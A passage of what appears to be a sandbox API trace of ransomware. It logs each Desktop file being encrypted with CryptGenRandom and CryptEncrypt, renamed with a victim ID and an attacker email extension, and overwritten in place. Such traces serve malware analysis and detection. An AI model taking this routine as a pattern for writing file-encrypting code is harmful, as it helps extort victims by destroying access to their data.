dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.741] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.741] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxJwLmffZ5ibXO_Ztslu.gif", dwFileAttributes=0x80) returned 1 [0160.742] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxJwLmffZ5ibXO_Ztslu.gif") returned 63 [0160.742] GetProcessHeap () returned 0x2e0000 [0160.742] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3a7428 [0160.742] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxJwLmffZ5ibXO_Ztslu.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxJwLmffZ5ibXO_Ztslu.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxJwLmffZ5ibXO_Ztslu.gif" [0160.742] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxJwLmffZ5ibXO_Ztslu.gif", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxJwLmffZ5ibXO_Ztslu.gif.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxJwLmffZ5ibXO_Ztslu.gif.12781717671972518758.ex_parvis@aol.com.AIR" [0160.742] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxJwLmffZ5ibXO_Ztslu.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zxjwlmffz5ibxo_ztslu.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxJwLmffZ5ibXO_Ztslu.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zxjwlmffz5ibxo_ztslu.gif.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.745] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZxJwLmffZ5ibXO_Ztslu.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zxjwlmffz5ibxo_ztslu.gif.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.745] GetProcessHeap () returned 0x2e0000 [0160.745] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0160.745] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=55382) returned 1 [0160.745] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xd856 [0160.745] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.745] GetProcessHeap () returned 0x2e0000 [0160.745] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.745] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.745] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.746] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.746] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.746] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd856) returned 0x3aa410 [0160.746] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd856) returned 0x3b7c70 [0160.746] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.746] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, nNumberOfBytesToRead=0xd856, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0xd856, lpOverlapped=0x0) returned 1 [0160.747] SetFilePointer (in: hFile=0x398, lDistanceToMove=-55382, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.747] WriteFile (in: hFile=0x398, lpBuffer=0x3b7c70*, nNumberOfBytesToWrite=0xd856, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b7c70*, lpNumberOfBytesWritten=0x2acf9c8*=0xd856, lpOverlapped=0x0) returned 1 [0160.747] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 [0160.747] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3b7c70 | out: hHeap=0x2e0000) returned 1 [0160.747] CloseHandle (hObject=0x398) returned 1 [0160.748] GetProcessHeap () returned 0x2e0000 [0160.748] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.748] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.748] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.748] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328ac8 | out: hHeap=0x2e0000) returned 1 [0160.748] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328b50 | out: hHeap=0x2e0000) returned 1 [0160.748] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328b50 [0160.748] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.748] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.748] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.748] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.748] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yw_NDNwDWV1e2l.wav", dwFileAttributes=0x80) returned 1 [0160.749] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yw_NDNwDWV1e2l.wav") returned 57 [0160.749] GetProcessHeap () returned 0x2e0000 [0160.749] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x31fae0 [0160.749] lstrcpyW (in: lpString1=0x31fae0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yw_NDNwDWV1e2l.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yw_NDNwDWV1e2l.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yw_NDNwDWV1e2l.wav" [0160.749] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yw_NDNwDWV1e2l.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yw_NDNwDWV1e2l.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yw_NDNwDWV1e2l.wav.12781717671972518758.ex_parvis@aol.com.AIR" [0160.749] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yw_NDNwDWV1e2l.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yw_ndnwdwv1e2l.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yw_NDNwDWV1e2l.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yw_ndnwdwv1e2l.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.753] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Yw_NDNwDWV1e2l.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yw_ndnwdwv1e2l.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.753] GetProcessHeap () returned 0x2e0000 [0160.753] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31fae0 | out: hHeap=0x2e0000) returned 1 [0160.753] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=12847) returned 1 [0160.753] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x322f [0160.754] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.754] GetProcessHeap () returned 0x2e0000 [0160.754] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.754] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.754] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.755] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.755] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.755] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x322f) returned 0x3aa410 [0160.755] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x322f) returned 0x3ad648 [0160.755] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.755] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, nNumberOfBytesToRead=0x322f, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0x322f, lpOverlapped=0x0) returned 1 [0160.755] SetFilePointer (in: hFile=0x398, lDistanceToMove=-12847, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.755] WriteFile (in: hFile=0x398, lpBuffer=0x3ad648*, nNumberOfBytesToWrite=0x322f, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ad648*, lpNumberOfBytesWritten=0x2acf9c8*=0x322f, lpOverlapped=0x0) returned 1 [0160.755] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 [0160.755] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ad648 | out: hHeap=0x2e0000) returned 1 [0160.755] CloseHandle (hObject=0x398) returned 1 [0160.756] GetProcessHeap () returned 0x2e0000 [0160.756] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.756] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.756] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.756] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328b50 | out: hHeap=0x2e0000) returned 1 [0160.756] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x328bd8 | out: hHeap=0x2e0000) returned 1 [0160.756] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x70) returned 0x3a9518 [0160.756] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.756] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.756] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.756] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.756] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vqjVrbgFol.wav", dwFileAttributes=0x80) returned 1 [0160.757] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vqjVrbgFol.wav") returned 53 [0160.757] GetProcessHeap () returned 0x2e0000 [0160.757] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd0) returned 0x3470a0 [0160.757] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vqjVrbgFol.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vqjVrbgFol.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vqjVrbgFol.wav" [0160.757] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vqjVrbgFol.wav", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vqjVrbgFol.wav.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vqjVrbgFol.wav.12781717671972518758.ex_parvis@aol.com.AIR" [0160.757] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vqjVrbgFol.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqjvrbgfol.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vqjVrbgFol.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqjvrbgfol.wav.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.759] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vqjVrbgFol.wav.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqjvrbgfol.wav.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.760] GetProcessHeap () returned 0x2e0000 [0160.760] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0160.760] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=52601) returned 1 [0160.760] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xcd79 [0160.760] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.760] GetProcessHeap () returned 0x2e0000 [0160.760] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.760] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.760] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.761] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.761] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.761] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xcd79) returned 0x3aa410 [0160.761] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xcd79) returned 0x3b7198 [0160.761] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.761] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, nNumberOfBytesToRead=0xcd79, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0xcd79, lpOverlapped=0x0) returned 1 [0160.762] SetFilePointer (in: hFile=0x398, lDistanceToMove=-52601, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.762] WriteFile (in: hFile=0x398, lpBuffer=0x3b7198*, nNumberOfBytesToWrite=0xcd79, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b7198*, lpNumberOfBytesWritten=0x2acf9c8*=0xcd79, lpOverlapped=0x0) returned 1 [0160.762] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 [0160.762] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3b7198 | out: hHeap=0x2e0000) returned 1 [0160.762] CloseHandle (hObject=0x398) returned 1 [0160.762] GetProcessHeap () returned 0x2e0000 [0160.762] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.762] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.762] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0160.762] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a9518 | out: hHeap=0x2e0000) returned 1 [0160.762] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a9428 | out: hHeap=0x2e0000) returned 1 [0160.762] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328bd8 [0160.762] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0160.762] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0160.762] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0160.762] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0160.762] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uHLEY_Gtgovhr5ztxC4-.gif", dwFileAttributes=0x80) returned 1 [0160.763] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uHLEY_Gtgovhr5ztxC4-.gif") returned 63 [0160.763] GetProcessHeap () returned 0x2e0000 [0160.763] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe4) returned 0x3a7428 [0160.763] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uHLEY_Gtgovhr5ztxC4-.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uHLEY_Gtgovhr5ztxC4-.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uHLEY_Gtgovhr5ztxC4-.gif" [0160.763] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uHLEY_Gtgovhr5ztxC4-.gif", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uHLEY_Gtgovhr5ztxC4-.gif.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uHLEY_Gtgovhr5ztxC4-.gif.12781717671972518758.ex_parvis@aol.com.AIR" [0160.763] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uHLEY_Gtgovhr5ztxC4-.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uhley_gtgovhr5ztxc4-.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uHLEY_Gtgovhr5ztxC4-.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uhley_gtgovhr5ztxc4-.gif.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0160.766] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\uHLEY_Gtgovhr5ztxC4-.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\uhley_gtgovhr5ztxc4-.gif.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0160.766] GetProcessHeap () returned 0x2e0000 [0160.766] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0160.766] GetFileSizeEx (in: hFile=0x398, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=37245) returned 1 [0160.766] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x917d [0160.766] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0160.766] GetProcessHeap () returned 0x2e0000 [0160.766] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0160.766] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0160.767] WriteFile (in: hFile=0x398, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0160.767] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0160.767] WriteFile (in: hFile=0x398, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0160.767] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x917d) returned 0x3aa410 [0160.767] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x917d) returned 0x3b3598 [0160.767] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.768] ReadFile (in: hFile=0x398, lpBuffer=0x3aa410, nNumberOfBytesToRead=0x917d, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3aa410*, lpNumberOfBytesRead=0x2acf9c8*=0x917d, lpOverlapped=0x0) returned 1 [0160.768] SetFilePointer (in: hFile=0x398, lDistanceToMove=-37245, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.768] WriteFile (in: hFile=0x398, lpBuffer=0x3b3598*, nNumberOfBytesToWrite=0x917d, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3b3598*, lpNumberOfBytesWritten=0x2acf9c8*=0x917d, lpOverlapped=0x0) returned 1 [0160.768] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3aa410 | out: hHeap=0x2e0000) returned 1 [0160.768] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3b3598 | out: hHeap=0x2e0000) returned 1 [0160.768] CloseHandle (hObject=0x398) returned 1 [0160.769] GetProcessHeap () returned 0x2e0000 [0160.769] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0160.769] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0160.769] HeapFree (in: hHeap=0x2e0000, 